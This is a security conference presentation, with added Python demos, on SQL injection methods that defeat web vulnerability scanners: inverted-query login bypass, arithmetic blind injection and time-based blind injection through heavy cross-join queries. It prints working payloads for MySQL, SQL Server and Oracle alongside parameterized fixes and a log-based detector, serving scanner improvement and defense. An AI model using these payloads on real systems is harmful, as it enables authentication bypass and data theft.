How ?¿$ & Developers Defeat The Most Famous Web Vulnerability Scanners or How To Recognize Old Friends

This document discusses techniques for defeating web vulnerability scanners, including inverted queries, arithmetic blind SQL injection, and time-based blind SQL injection using heavy queries. It explains how these techniques can exploit vulnerabilities that scanners have trouble detecting. The document includes examples of exploiting each technique against different databases like SQL Server, Oracle, and MySQL. It also demonstrates a tool called Marathon Tool that automates time-based blind SQL injection attacks. The overall message is that modern exploits require improved automatic scanning to detect more sophisticated attacks.


How ?¿$ & developers defeat the most famous web vulnerability scanners
or how to recognize old friends

Chema Alonso
Informática64
José Parada
Microsoft Ibérica

Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavy Queries
5.- Conclusions

1.- Introduction

SQL Injection is still here among us

Web Application Security Consortium: Comparison
http://projects.webappsec.org/Web-Application-SecurityStatistics

12.186 sites
97.554 bugs

Need to Improve Automatic Scanning
Manual scanning is not always possible:
- Time
- Confidentiality
- Money, money, money

We need to study new ways to recognize old-fashioned vulnerabilities in order to improve automatic scanning tools.

2.- Inverted Queries

Homers, how are they?
- Lazy
- Badly trained
- Poor experience in security stuff
- Don't like working
- Don't like computing
- Don't like coding
- Don't like you!

Flanders are Left-handed

Right:
SELECT UID
FROM USERS
WHERE NAME=V_NAME
AND PASSWORD=V_PASSW;

Wrong?
SELECT UID
FROM USERS
WHERE V_NAME=NAME
AND V_PASSW=PASSWORD;

Login Inverted Query

Select uid
From users where 'v_name'=name and 'v_pass'=password

http://www.web.com/login.php?v_name=Robert&v_pass=Kubica' or '1'='1

Select uid
From users where 'Robert'=name and 'Kubica' or '1'='1'=password
-> FAIL
(The classic payload fails because, with the operands inverted, the trailing '1'='1' is compared against the password column instead of standing alone as a true condition.)

Login Inverted SQL Injection: an example

Select uid
From users where 'v_name'=name and 'v_pass'=password

http://www.web.com/login.php?v_name=Robert&v_pass='='' or 1=1 or 'Kubica

Select uid
From users where 'Robert'=name and ''='' or 1=1 or 'Kubica'=password
-> SUCCESS
(This payload closes the inverted comparison with ''='' first, so the injected 1=1 stands alone and the final 'Kubica'=password absorbs the trailing quote.)
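To make the contrast concrete, here is an added example (not code from the slides or from the authors) that runs the login query above in three forms: the classic concatenated query, the inverted concatenated query, and the inverted query with bound parameters. SQLite stands in for the MySQL engine the slides use (its precedence of =, and, or and its string-to-boolean conversion give the same outcomes for these two payloads), and the users table and credentials are constructed sample data.

```python
import sqlite3

# Constructed sample users (not from the slides).
USERS = [(1, "Robert", "Kubica"), (2, "Homer", "donut")]


def _db():
    """Fresh in-memory database with the sample users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def login_normal_unsafe(name, password):
    """The 'right-handed' query, built by string concatenation."""
    sql = (f"SELECT uid FROM users WHERE name='{name}' "
           f"AND password='{password}' ORDER BY uid")
    return [row[0] for row in _db().execute(sql)]


def login_inverted_unsafe(name, password):
    """The 'left-handed' (inverted) query from the slides, still concatenated."""
    sql = (f"SELECT uid FROM users WHERE '{name}'=name "
           f"AND '{password}'=password ORDER BY uid")
    return [row[0] for row in _db().execute(sql)]


def login_inverted_safe(name, password):
    """Same inverted shape, but with bound parameters: input is a value, never SQL."""
    sql = "SELECT uid FROM users WHERE ?=name AND ?=password ORDER BY uid"
    return [row[0] for row in _db().execute(sql, (name, password))]


CLASSIC_PAYLOAD = "Kubica' or '1'='1"          # the 'old friend' a scanner sends
INVERTED_PAYLOAD = "'='' or 1=1 or 'Kubica"    # the payload shown on the slide

if __name__ == "__main__":
    print("normal, classic payload:   ", login_normal_unsafe("Robert", CLASSIC_PAYLOAD))
    print("inverted, classic payload: ", login_inverted_unsafe("Robert", CLASSIC_PAYLOAD))
    print("inverted, inverted payload:", login_inverted_unsafe("Robert", INVERTED_PAYLOAD))
    print("parameterized, either:     ", login_inverted_safe("Robert", INVERTED_PAYLOAD))
```

The defender's point: inverting the comparison only changes which payload works, so a scanner that sends just the classic payload reports nothing against the inverted query. The parameterized form returns the same empty result for the classic payload, the inverted payload and any other string, because the value is bound and never parsed as SQL.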

Blind Attacks
The attacker injects code but can't access the data directly.
However, the injection changes the behavior of the web application.
The attacker then looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
- Blind SQL Injection
- Blind XPath Injection
- Blind LDAP Injection

Blind SQL Injection Attacks

Attacker injects:
- True where clauses
- False where clauses
Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2

The program doesn't return any visible data from the database, nor data in error messages.
The attacker can't see any data extracted from the database.

Blind SQL Injection Attacks

The attacker analyzes the response pages looking for differences between the True-Answer Page and the False-Answer Page:
- Different hashes
- Different HTML structure
- Different patterns (keywords)
- Different linear ASCII sums
- Different behavior, for example: response time

Blind SQL Injection Attacks

If any difference exists, then the attacker can extract all information from the database.
How? Using booleanization.
MySQL:
Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
True-Answer Page or False-Answer Page?

MSSQL:
Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)

Oracle:
Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)

Blind Inverted Query

Select product
From products
Where v_value=id;

http://www.web.com/products.php?v_value=2 and 1=1

Select product
From products
Where 2 and 1=1=id;
-> FAIL
(The chain 1=1=id is evaluated as (1=1)=id, i.e. 1=id, so the lookup no longer targets id=2.)

The MySQL Case

- 1 is True
- 1=1=1 -> True
- 1=1=(1+1-1)=abs(1)=1 -> True
- 2=2=2 -> False: 2=2 becomes True, True equals 1, so 1=2 is False

Select product
From products
Where v_value=id;

http://www.web.com/products.php?v_value=1 and 1=1

Select product
From products
Where 1 and 1=1=id;
-> SUCCESS (if there is an id=1)

Web Scanner behaviors

Acunetix
Paros
AppScan
W3af
Wapiti
Proxy Strike

Acunetix & Homer

Acunetix & Flanders

AppScan & Homer

AppScan & Flanders

Paros & Homer

Paros & Flanders

W3af & Homer

W3af & Flanders

Wapiti & Homer

Wapiti & Flanders

Demo
W3af
Wapiti
Proxy Strike

Results

                Normal                                   Inverted
                MS SQL Server       MySQL                MS SQL Server       MySQL
                Numeric  String     Numeric  String      Numeric  String     Numeric  String
Paros
AppScan
Acunetix
w3af
wapiti
Proxy Strike

(The per-cell results were icons on the original slide and are not preserved in this text.)

In the end
OUCH!!!

Thank God for keeping me safe

Solutions?
- Concat string injection
- Arithmetic Blind SQL Injection
- Time-Based Blind SQL Injection
  - Delay functions
  - Heavy queries

3.- Arithmetic Blind SQL Injection

What about these queries?

How to detect/exploit this Blind SQL Injection vulnerability?
The query forces the parameter to be numeric:
SELECT field FROM table WHERE id=abs(param)
Ex:
Get Param(ID)
Select .. Where att1=abs(ID)
Select .. Where att2=k1-ID
Print response

Neither AND nor OR operators can be used.
Boolean logic needs to be created with math operations.

Arithmetic Blind SQL Injection

Divide by zero (David Litchfield)
Id=A+(1/(ASCII(B)-C))
A -> Param value originally used in the query.
B -> Value we are searching for, e.g.: Substring(passwd,1,1)
C -> Counter [0..255]

TRUE: When ASCII(B)=C, the DB will generate a divide-by-zero exception.

Arithmetic Blind SQL Injection

Sums and subtractions
Id=A+ASCII(B)-C
A -> Param value originally used in the query.
B -> Value we are searching for, e.g.: Substring(passwd,1,1)
C -> Counter [0..255]

When ASCII(B)=C, the response page for id=A+ASCII(B)-C will be the same as for id=A.

Arithmetic Blind SQL Injection

Value type overflow
Id=A+((C/ASCII(B))*(K))
A -> Param value originally used in the query.
B -> Value we are searching for, e.g.: Substring(passwd,1,1)
C -> Counter [0..255]
K -> Value that overflows the type defined for A (e.g. if A is integer, then K=2^32)

When C/ASCII(B)==1, K*1 overflows the data type.
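As an added example (not code from the slides or the authors), the following shows why both the numeric inverted query from section 2 (WHERE v_value=id) and the abs()-wrapped query above remain reachable by arithmetic even though neither accepts AND/OR in the usual way, and what the fix looks like: type validation at the application boundary plus a bound parameter. SQLite stands in for MySQL; the products table, the sums-and-subtractions probe values, and the 9-digit id limit are assumptions.

```python
import re
import sqlite3

# Constructed sample table (not from the slides).
PRODUCTS = [(1, "widget"), (2, "gadget"), (3, "gizmo")]


def _db():
    """Fresh in-memory database with the sample products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, product TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return conn


def product_inverted_unsafe(v_value):
    """Numeric inverted query from section 2 (WHERE v_value=id), concatenated."""
    sql = f"SELECT product FROM products WHERE {v_value}=id"
    return [row[0] for row in _db().execute(sql)]


def product_abs_unsafe(param):
    """abs() forces a numeric result, but the expression inside it is attacker-built,
    so id=A+X-Y returns exactly the page of id=A whenever X equals Y."""
    sql = f"SELECT product FROM products WHERE id=abs({param})"
    return [row[0] for row in _db().execute(sql)]


# Assumed policy: a plain (optionally signed) integer of at most 9 digits.
INTEGER = re.compile(r"-?\d{1,9}")


def parse_id(param):
    """Reject anything that is not a plain integer before it reaches SQL."""
    if INTEGER.fullmatch(param) is None:
        raise ValueError("id must be a plain integer")
    return int(param)


def is_valid_id(param):
    """Boolean view of parse_id, convenient for logging rejected inputs."""
    try:
        parse_id(param)
        return True
    except ValueError:
        return False


def product_safe(param):
    """Validated type plus bound parameter: arithmetic never reaches the SQL parser."""
    sql = "SELECT product FROM products WHERE id=abs(?)"
    return [row[0] for row in _db().execute(sql, (parse_id(param),))]


if __name__ == "__main__":
    print("inverted, '2 and 1=1' resolves to id=1:", product_inverted_unsafe("2 and 1=1"))
    print("abs(), '2+1-1' looks like id=2:        ", product_abs_unsafe("2+1-1"))
    print("abs(), '2+1-0' looks like id=3:        ", product_abs_unsafe("2+1-0"))
    print("validated, '2+1-1' accepted?           ", is_valid_id("2+1-1"))
```

The abs() wrapper is the part worth noticing: the two unsafe probes above return ordinary, well-formed pages, which is exactly why a scanner that only watches for errors or for AND/OR-shaped differences sees nothing. The strict integer check makes the probe fail at the boundary, and the bound parameter means even a value that slips past validation is treated as a number rather than as SQL.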

Demo:
- Divide by zero
- Sums and subtractions
- Integer overflow

Conclusions
Arithmetic Blind SQL Injection allows binary logic to be constructed without AND and OR.
It detects bugs in this kind of query, and also in inverted queries in which a numeric value is used.

Almost none of the vulnerability scanners use this method.

4.- Time-Based Blind SQL Injection using Heavy Queries

Time-Based Blind SQL Injection

In scenarios with no differences between the True-Answer Page and the False-Answer Page, time delays can be used.
The injection forces a delay in the response page when the injected condition is True.
- Delay functions:
  SQL Server: waitfor
  Oracle: dbms_lock.sleep
  MySQL: sleep or the Benchmark function
  Postgres: pg_sleep

Ex:
; if (exists(select * from users)) waitfor delay '0:0:5'

Time-Based Blind SQL Injection

What about DBs without delay functions, i.e.:
- Oracle connections without PL/SQL injection
- MS Access
- DB2

Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?

Where-Clause execution order
Select whatever
From whatever
Where condition1 and condition2
- Condition1 lasts 10 seconds
- Condition2 lasts 100 seconds
Which condition should be executed first?

The heavy condition first

Condition2 (100 sec) | Condition1 (10 sec) | Condition2 & condition1 | Response Time
TRUE                 | FALSE               | FALSE                   | 110 sec
TRUE                 | TRUE                | TRUE                    | 110 sec
FALSE                | Not evaluated       | FALSE                   | 100 sec

The light condition first

Condition1 (10 sec) | Condition2 (100 sec) | Condition1 & condition2 | Response Time
TRUE                | FALSE                | FALSE                   | 110 sec
TRUE                | TRUE                 | TRUE                    | 110 sec
FALSE               | Not evaluated        | FALSE                   | 10 sec

Time-Based Blind SQL Injection using Heavy Queries

The attacker can perform an exploitation by delaying the True-answer page using a heavy query.
It depends on how the database engine evaluates the where clauses in the query.
There are two types of database engines:
- Databases without an optimization process
- Databases with an optimization process

Time-Based Blind SQL Injection using Heavy Queries

The attacker could inject a heavy cross-join condition to delay the response page in True-Injections.
The cross-join injection must be heavier than the other condition.
The attacker only has to know or guess the name of a table with select permission in the database.
Example in MSSQL:
Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
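As an added example from the detection side (not part of the slides or of the Marathon Tool), here is a small access-log analyser that flags requests carrying the two indicators this section describes: a delay function from the list above, or one table repeated many times inside a single FROM list, which is the cross-join shape of the MSSQL example. The log format (timestamp, method, request target, status, server-side milliseconds), the 5-second threshold and the repetition threshold are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log (not from the slides). Fields: timestamp, method,
# request target, status, server-side elapsed milliseconds. Lines 2 and 3 carry
# payloads of the shapes shown on the slides; line 5 is merely a slow report.
SAMPLE_LOG = """\
2009-09-01T10:00:01 GET /program.php?id=1 200 120
2009-09-01T10:00:02 GET /program.php?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20as%20sys2,%20sysusers%20as%20sys3,%20sysusers%20AS%20sys4)%3E1 200 14000
2009-09-01T10:00:03 GET /program.php?id=1;%20if%20(exists(select%20*%20from%20users))%20waitfor%20delay%20'0:0:5' 200 5100
2009-09-01T10:00:04 GET /products.php?v_value=2 200 900
2009-09-01T10:00:05 GET /report.php?year=2009 200 6200
"""

# Delay primitives named on the slides (SQL Server, Oracle, Postgres, MySQL).
DELAY_FUNCTIONS = ("waitfor", "dbms_lock.sleep", "pg_sleep", "benchmark(", "sleep(")
SLOW_MS = 5000          # assumed threshold; tune to the application's own latency
MIN_SELF_JOINS = 3      # assumed: a table repeated this often in one FROM list is suspicious

# Everything after FROM up to the closing parenthesis of the subquery.
FROM_LIST = re.compile(r"\bfrom\s+([^)]+)", re.IGNORECASE)


def self_join_depth(text):
    """Highest number of times a single table name repeats inside one FROM list."""
    worst = 0
    for from_list in FROM_LIST.findall(text):
        counts = {}
        for item in from_list.split(","):
            words = item.split()
            if words:
                table = words[0].lower()
                counts[table] = counts.get(table, 0) + 1
        if counts:
            worst = max(worst, max(counts.values()))
    return worst


def analyze_line(line):
    """Return the list of indicators found in one log line (empty if none)."""
    _ts, _method, target, _status, elapsed = line.split()
    elapsed_ms = int(elapsed)
    # parse_qsl percent-decodes each parameter value for us.
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    values = " ".join(value for _, value in pairs)
    lowered = values.lower()
    reasons = []
    hit = next((fn for fn in DELAY_FUNCTIONS if fn in lowered), None)
    if hit:
        reasons.append(f"delay function: {hit}")
    depth = self_join_depth(values)
    if depth >= MIN_SELF_JOINS:
        reasons.append(f"self-join x{depth}")
    if elapsed_ms >= SLOW_MS:
        reasons.append(f"slow response: {elapsed_ms} ms")
    return reasons


def scan_log(log_text):
    """Alert on lines carrying an injection indicator; slowness alone is not evidence."""
    alerts = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        reasons = analyze_line(line)
        if any(not r.startswith("slow response") for r in reasons):
            alerts.append((number, reasons))
    return alerts


if __name__ == "__main__":
    for number, reasons in scan_log(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```

Response time is recorded but never used on its own, because a heavy query against a small table, or a slow legitimate report, would otherwise drown the signal; it is the combination of an SQL-shaped parameter value and an unusual elapsed time that makes the line worth a look, and the elapsed figure then tells the analyst whether the condition evaluated as true.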

Default tables to construct a heavy query
Microsoft SQL Server
  sysusers

Oracle
  all_users

MySQL (version 5)
  information_schema.columns

Microsoft Access
  MSysAccessObjects (97 & 2000 versions)
  MSysAccessStorage (2003 & 2007)

Default tables to construct a heavy query
...or whatever you can guess:
Clients
Customers
News
Logins
Users
Providers
...Use your imagination

Ex 1: MS SQL Server
Query takes 14 seconds -> True-Answer
Query takes 1 second -> False-Answer

Ex 2: Oracle
Query takes 22 seconds -> True-Answer
Query takes 1 second -> False-Answer

Ex 3: Access 2007
Query takes 39 seconds -> True-Answer
Query takes 1 second -> False-Answer

Marathon Tool
Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle databases.
- Schema extraction from known databases
- Extracts data using heavy queries no matter which database engine (without schema)
- Developed in .NET
- Source code available
http://www.codeplex.com/marathontool

Demo: Marathon Tool

5.- Conclusions

The real world has plenty of kinds of developers

References
Inverted SQL queries (Spanish)
http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-deii.html
Arithmetic Blind SQL Injection (Spanish)
http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sqlinjection-i-de-ii.html
Time-Based Blind SQL Injection Using Heavy Queries & Marathon Tool
http://www.defcon.org/images/defcon-16/dc16-presentations/alonsoparada/defcon-16-alonso-parada-wp.pdf
Marathon Tool
http://www.codeplex.com/marathontool
Connection String Attacks (Spanish)
http://www.slideshare.net/chemai64/connection-string-parameterpollution

Don't complain about your job!!

Thanks!
Chema Alonso
([email protected])
José Parada
([email protected])
